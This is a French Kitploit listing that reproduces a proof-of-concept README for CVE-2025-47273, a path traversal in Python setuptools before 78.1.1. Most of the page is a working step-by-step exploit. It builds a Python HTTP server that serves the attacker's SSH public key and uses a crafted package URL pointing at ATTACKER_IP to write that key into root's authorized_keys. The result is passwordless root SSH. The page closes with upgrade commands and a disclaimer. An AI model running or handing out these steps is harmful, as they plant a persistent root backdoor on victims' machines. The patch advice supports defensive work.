Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-47273-POC — CVE-2025-47273 — PoC de traversée de chemin setuptools | Kitploit
Outils/GitHubGitHub/alielkhatteb/cve-2025-47273-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité de la Chaîne LogistiqueApprentissage et Éducation
GitHubalielkhatteb/cve-2025-47273-poc

CVE-2025-47273-POC

CVE-2025-47273 — PoC de traversée de chemin setuptools

Voir le dépôt
111il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

setuptools – Traversée de chemin CVE-2025-47273

📖 Vue d'ensemble

Preuve de concept d'exploitation pour une vulnérabilité de traversée de chemin dans Python setuptools < 78.1.1.

En abusant de la fonction _download_url du composant PackageIndex, un attaquant peut écrire des fichiers arbitraires à n'importe quel endroit du système de fichiers — avec les privilèges du processus exécutant setuptools.


🎯 Résumé de la vulnérabilité

ChampDétail
🎯 CiblePython setuptools < 78.1.1
🐛 Classe de bogueTraversée de chemin (CWE-22)
💥 ImpactÉcriture arbitraire de fichiers
📍 Vecteur d'attaqueURL d'index de paquet malveillante
🔍 Cause racineos.path.join() ignore tmpdir lorsque le second argument commence par /

📋 Prérequis

  • Python 3 sur les deux machines
  • Paire de clés SSH déjà générée sur l'attaquant (~/.ssh/id_rsa + id_rsa.pub)
  • Le script cible appelle PackageIndex de setuptools avec une URL contrôlée par l'utilisateur

🚀 Utilisation

🔧 Étape 1 — Préparer votre clé publique SSH (Machine attaquante)

# Copiez votre clé publique dans le répertoire courant pour la servir
cp ~/.ssh/id_rsa.pub authorized_keys

📡 Étape 2 — Démarrer le serveur HTTP malveillant (Machine attaquante)

Ce serveur répond à toute requête GET avec votre clé publique — indépendamment du chemin. setuptools demandera le chemin /USER/.ssh/authorized_keys mais recevra le contenu de votre clé.

cat > python_server.py << 'EOF'
import http.server
import socketserver

class Handler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Serve authorized_keys regardless of path requested
        self.send_response(200)
        self.end_headers()
        with open("authorized_keys", "rb") as f:
            self.wfile.write(f.read())

with socketserver.TCPServer(("", 80), Handler) as httpd:
    httpd.serve_forever()
EOF

python3 python_server.py

💥 Étape 3 — Déclencher la traversée de chemin (Machine victime)

ATTACKER_IP="192.168.1.20"
TARGET_USER="root"

sudo python3 /path/to/vulnerable_script.py \
  "http://${ATTACKER_IP}/%2f${TARGET_USER}%2f.ssh%2fauthorized_keys#egg=evil-1.0"

👾 Étape 4 — Se connecter en tant que root (Machine attaquante)

ssh root@VICTIM_IP

Aucun mot de passe. Shell root direct. 🔑


🔒 Correctif

La version 78.1.1 corrige le problème.

Gestionnaire de paquetsCommande
🐍 pippip install --upgrade setuptools
🐧 Debian/Ubuntusudo apt upgrade python3-setuptools
🎩 RHEL/Fedorasudo dnf upgrade python3-setuptools
🏗️ ManuelVersions de setuptools

📎 Références

  • 🔗 NVD — CVE-2025-47273
  • 🔗 GitHub Advisory — GHSA-5rjg-fvgr-3xxf
  • 🔗 Commit de correction de setuptools
  • 🔗 PoC de setuptools

⚖️ Avertissement et conditions

Ce code de Preuve de Concept (PoC) est fourni à des fins éducatives et de tests d'intrusion autorisés uniquement.

  • Aucune autorisation n'est accordée pour modifier, redistribuer ou utiliser ce code à d'autres fins.
  • Une utilisation ou modification non autorisée peut être illégale et contraire à l'éthique.
  • Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages.
Télécharger l’outil